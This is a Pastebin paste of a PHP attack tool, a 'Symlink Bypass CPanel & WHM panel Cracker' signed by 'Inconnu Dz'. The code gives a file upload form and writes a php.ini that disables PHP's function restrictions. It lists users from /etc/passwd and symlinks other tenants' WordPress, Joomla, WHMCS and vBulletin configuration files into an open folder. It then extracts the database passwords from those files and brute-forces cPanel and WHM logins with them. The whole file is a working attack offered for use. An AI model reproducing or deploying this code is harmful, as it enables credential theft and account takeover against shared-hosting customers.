Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>//# Inconnu Dz #//</title>
- </head>
- <center><font color=#00FF66 size=5 face=tahoma>Symlink Bypass CPanel & WHM panel Cracker By Inconnu Dz</font></center>
- <center><font color=green size=4><<<<<<<<<<<<<<<<<<<<<<<<<<<<<font color=red size=4><<<<<>>>>><font color=white size=4>>>>>>>>>>>>>>>>>>>>>>>>>>>>></font></center>
- <center><font color=orenge size=4 face=tahoma>Inconnu Dz || Algeria Attacker</font></center><br>
- <br></br>
- <?php
- #_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _#
- # this script coded By Inconnu Dz #
- #fb : https://www.facebook.com/ghost.attack.dz #
- # thenks to All My Frinds :D #
- #_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _#
- ?>
- <center><font color=red size=5 face=tahoma>Server Search :<br></font><br>
- <?php //#Inconnu Dz#//
- echo " <center> </center>";
- $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
- echo "<font color=#00AA99 face=tahoma>Server IP : </font> <font color=orange face=tahoma>".gethostbyname($_SERVER["HTTP_HOST"])."
- </font><font color=orange size=4 face=tahoma> [</span>
- <a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\"><font color=orenge>Bing Search</font></a>][</span><a href='http://zone-h.com/archive/ip=".$serverIP."' target=\"_blank\"><font color=orenge>Zone-H Search</font></a>]<center></font>";
- ?><br> </center> <br><br>
- <center> <?php
- echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
- if( $_POST['_upl'] == "Upload" ) {
- if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>DONE :3 !!!</b><br><br>'; }
- else { echo '<b>Upload Failed :( !!!</b>'; }
- echo '<font color=orenge size=5>==> http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/".$_FILES['file']['name']."";
- }
- ?> </center>
- <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
- <form method=post>
- <input type=submit name=ini value="Generate PHP.ini" /></form>
- <?php
- if(isset($_POST['ini']))
- {
- $i=fopen('php.ini','w');
- $rr=" disable_functions=none ";
- fwrite($i,$rr);
- $link="<a href=php.ini><font color=white size=2 ><u>Cick here :D</u></font></a>";
- echo $link;
- }
- ?>
- <?php
- //////////////////////////////////////
- ///// mass symlink ////////
- //////////////////////////////////////
- ?>
- <form method=post>
- <input type=submit name="usre" value="Get User & Config" /></form>
- <?php
- if(isset($_POST['usre'])){
- ?><form method=post>
- <textarea rows=20 cols=40 name=user><?php $user=file("/etc/passwd");
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit name=dz value="config" /></form>
- <?php } ?>
- <?php
- error_reporting(0);
- echo "<font color=red size=2 face=\"comic sans ms\">";
- if(isset($_POST['dz']))
- {
- $dir=mkdir('DZ',0777);
- $i = " Options all \n DirectoryIndex DZ.html \n Require None \n Satisfy Any";
- $f = fopen('DZ/.htaccess','w');
- fwrite($f,$i);
- $consym="<a href=DZ/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
- echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
- $usr=explode("\n",$_POST['user']);
- foreach($usr as $uss )
- {
- $us=trim($uss);
- $i="DZ/";
- symlink('/home/'.$us.'/public_html/wp-config.php',$i.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$i.$us.'..word-wp');
- symlink('/home/'.$us.'/public_html/blog/wp-config.php',$i.$us.'..wpblog');
- symlink('/home/'.$us.'/public_html/configuration.php',$i.$us.'..joomla-or-whmcs');
- symlink('/home/'.$us.'/public_html/joomla/configuration.php',$i.$us.'..joomla');
- symlink('/home/'.$us.'/public_html/vb/includes/config.php',$i.$us.'..vbinc');
- symlink('/home/'.$us.'/public_html/includes/config.php',$i.$us.'..vb');
- symlink('/home/'.$us.'/public_html/conf_global.php',$i.$us.'..conf_global');
- symlink('/home/'.$us.'/public_html/inc/config.php',$i.$us.'..inc');
- symlink('/home/'.$us.'/public_html/config.php',$i.$us.'..config');
- symlink('/home/'.$us.'/public_html/sites/default/settings.php',$i.$us.'..sites');
- symlink('/home/'.$us.'/public_html/whm/configuration.php',$i.$us.'..whm');
- symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$i.$us.'..whmcs');
- symlink('/home/'.$us.'/public_html/support/configuration.php',$i.$us.'..supporwhmcs');
- symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$i.$us.'..WHM');
- symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$i.$us.'..whmc');
- symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$i.$us.'..WHMcs');
- symlink('/home/'.$us.'/public_html/support/configuration.php',$i.$us.'..whmcsupp');
- symlink('/home/'.$us.'/public_html/clients/configuration.php',$i.$us.'..whmcs-cli');
- symlink('/home/'.$us.'/public_html/client/configuration.php',$i.$us.'..whmcs-cl');
- symlink('/home/'.$us.'/public_html/clientes/configuration.php',$i.$us.'..whmcs-CL');
- symlink('/home/'.$us.'/public_html/cliente/configuration.php',$i.$us.'..whmcs-Cl');
- symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$i.$us.'..whmcs-csup');
- symlink('/home/'.$us.'/public_html/billing/configuration.php',$i.$us.'..whmcs-bill');
- symlink('/home/'.$us.'/public_html/admin/config.php',$i.$us.'..admin-conf');
- }
- }
- ?>
- <form method=post>
- <input type=submit name=sm value="Grab Passwords from Configuration files"></form>
- <?php
- error_reporting(0);
- set_time_limit(0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
- {
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[1]);
- $ar=trim($ar1[0]);
- return $ar;
- }
- if(isset($_POST['sm']))
- {
- echo '<font color=orange>OK++';
- $ffile=fopen('DZ.txt','a+');
- $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/DZ/";
- $re=$r;
- $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
- $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- $usersss=$str[0];
- foreach($confi as $co)
- {
- $uurl=$re.$usersss.$co;
- $uel=$uurl;
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $uel);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
- $result['EXE'] = curl_exec($ch);
- curl_close($ch);
- $uxl=$result['EXE'];
- if($uxl && preg_match('/table_prefix/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Wordpress </font></td></tr></table>";
- echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Whmcs </font></td></tr></table>";
- echo $dbp=entre2v2($uxl,"db_password = '","';");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbprefix/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Joomla </font></td></tr></table>";
- echo $db=entre2v2($uxl,"password = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/admincpdir/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is vbulletin </font></td></tr></table>";
- echo $db=entre2v2($uxl,"password'] = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
- echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbpass/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
- echo $db=entre2v2($uxl,"dbpass = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbpass/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
- echo $db=entre2v2($uxl,"dbpass = '","';");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- elseif($uxl && preg_match('/dbpass/i',$uxl))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
- echo $db=entre2v2($uxl,"dbpass = \"","\";");
- if(!empty($db))
- $pass=$db."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- }
- ?>
- <form method=post>
- <input type=submit name=cpanel value="CPanel & WHM panel cracker"><p>
- <?php
- if(isset($_POST['cpanel']))
- {
- ?>
- <form method=post><div align=center><table>
- <font color=orange size=4> ==> </font> <select name="op"> <option name="op" value="cp">CPanel</option>
- <option name="op" value="whm">WHMPanel</option></table><p>
- <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
- <?php
- $d=getcwd()."/DZ.txt";
- $pf=file($d);
- foreach($pf as $rt)
- {
- $str=explode('\n',$rt);
- echo trim($str[0])."\n";
- } ?></textarea><p>
- <input type=submit name=cpanelcracking value="crack"></form>
- <?php
- }
- ?>
- <?php
- error_reporting(0);
- $connect_timeout=5;
- set_time_limit(0);
- $userl=$_POST['usernames'];
- $passl=$_POST['passwords'];
- $attack=$_POST['op'];
- $target = "localhost";
- if(isset($_POST['cpanelcracking']))
- {
- if($userl!=="" && $passl!=="")
- {
- if($_POST["op"]=="cp")
- {
- $cracked=$_POST['crack'];
- @fopen($cracked,'a');
- echo "Attacking CPanel....please wait till the end of process \n";
- }
- elseif($_POST["op"]=="whm")
- {
- @fopen($cracked,'a');
- echo "Attacking WHM panel....please wait till the end of process";
- }
- function cpanel($host,$user,$pass,$timeout){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 0 ){
- echo "<table width=100% ><tr><td align=center><b></font>
- <font color=red size=2> Cracked </font>
- <font color=white size=2> Username is </font>
- <font color=green size=2> $user</font>
- <font color=red size=2> & </font>
- <font color=white size=2> Password is </font>
- <font color=green size=2> $pass </font>
- </font></b></td></tr></table>";
- }
- curl_close($ch);}
- $userlist=explode("\n",$userl);
- $passlist=explode("\n",$passl);
- if ($attack == "cp")
- {
- foreach ($userlist as $user) {
- echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
- $finaluser = trim($user);
- foreach ($passlist as $password ) {
- $finalpass = trim($password);
- cpanel($target,$finaluser,$finalpass,$connect_timeout);
- }
- }
- }
- function whm($host,$user,$pass,$timeout){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 0 ){
- echo "<table width=100% ><tr><td align=center><b></font>
- <font color=red size=2> Cracked </font>
- <font color=white size=2> Username is </font>
- <font color=green size=2> $user</font>
- <font color=red size=2> & </font>
- <font color=white size=2> Password is </font>
- <font color=green size=2> $pass </font>
- </font></b></td></tr></table>";
- }
- curl_close($ch);}
- $userlist=explode("\n",$userl);
- $passlist=explode("\n",$passl);
- if ($attack == "whm")
- {
- foreach ($userlist as $user) {
- echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>user under attack is $user </font></td></tr></table>";
- $finaluser = trim($user);
- foreach ($passlist as $password ) {
- $finalpass = trim($password);
- whm($target,$finaluser,$finalpass,$connect_timeout);
- }
- }
- }
- }
- elseif($userl=="")
- {
- echo "you have left user list field empty";
- }
- elseif($passl=="")
- {
- echo "please put passwords in paasword list field";
- }
- }
- ?>
- <br>
- <br><br><br></br><div align=center><font color=#ff9933 font size=4><marquee behavior="scroll" direction="left" scrollamount="3" scrolldelay="30" width="70%">
- <span class="footerlink"><br><br><br><font color=orenge> Greetz to </font> <font color=red> : </font>Pri Nce <font color=red> & </font> Matrix Dz <font color=red> & </font> Abdelhak Ghazi <font color=red> & </font> Cyborg Dz <font color=red> & </font> Mr Abdou <font color=red> & </font> Vendita Dz <font color=red> & </font> Achraf Dz <font color=red> & </font> Dxman Benz <font color=red> & </font> and All Dz Hacker :D<span>
- </marquee><br></font></div><div align=center><table width=50%><br>
- <center><font color=orange size=4>https://www.facebook.com/ghost.attack.dz</font></center>
- <br><center><font color=red>______________________________________________________________________________________________________________________________________</font></center>
- <br><center><font color="orenge" face="verdana,arial" size=-1>~ Coded By Inconnu Dz ~</font></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement